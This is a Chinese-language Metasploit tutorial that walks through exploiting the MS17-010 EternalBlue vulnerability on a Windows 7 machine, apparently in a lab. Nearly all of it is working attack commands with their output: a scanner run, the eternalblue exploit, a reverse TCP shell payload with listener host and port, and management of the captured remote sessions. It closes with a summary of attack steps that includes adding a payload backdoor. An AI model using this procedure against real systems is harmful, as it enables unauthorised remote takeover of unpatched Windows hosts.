使用msf渗透Win7主机,并远程执行命令
整体流程
已知漏洞→查找模块→配置程序→执行exploit
查找模块:
search MS17-... show exploits show payloads show auxiliary
配置程序:
显示参数: show options show targets show encoders show advanced info xxx ---------- 设置参数: use xxx(exploit) set xxx(payload) set xxx xxx(参数)
执行exploit:
exploit(命令) run(命令)
查找该漏洞的扫描模块
msf5 > search ms17-010 ------ auxiliary/scanner/smb/smb_ms17_010 (这是一个扫描模块)
加载模块
msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) >
查看设置哪些参数
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
设置目标HOSTS
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.255.150
查看设置的HOSTS
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options RHOSTS 192.168.255.150
执行攻击命令开始扫描该主机
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
查找该漏洞的攻击模块
msf5 > search ms17-010 --------- exploit/windows/smb/ms17_010_eternalblue (永恒之蓝)
加载该模块
msf5 > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) >
检查要设置的参数
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
设置靶机的HOSTS
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.255.150 RHOSTS => 192.168.255.150
查看可以复现的系统
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets Exploit targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
使用攻击载荷(payload)设置本地监听
msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/shell -------- payload/windows/shell/reverse_tcp
设置攻击载荷(payload)
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp
显示设置的参数
设置本地端口和IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.255.200 LPORT 4444 LHOST => 192.168.255.200 LPORT 4444
执行攻击命令
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
拿到shell后解决乱码问题
C:Windwossystem32> chcp 65001
Ctrl+C断开连接
渗透成功之后将会话保存到后台
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
查看保存到后台的会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
启用这个会话
session -i [会话ID]
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
进入会话后想返回而不丢失这个会话,[返回并保持到后台]
C:Windowssystem32>background Background session 2? [y/N] y
清理这个会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2 [*] Killing the following session(s): 2
参数 | 解释 |
---|---|
Name | 参数名称 |
Current Setting | 默认值 |
Required | 是否必须设置 |
Description | 参数的描述 |
总结使用metasploit攻击的步骤
-
1、查找CVE公布的漏洞
-
2、查找对应的exploit模块
-
3、配置模块参数
-
4、添加payload后门
-
5、执行exploit开始攻击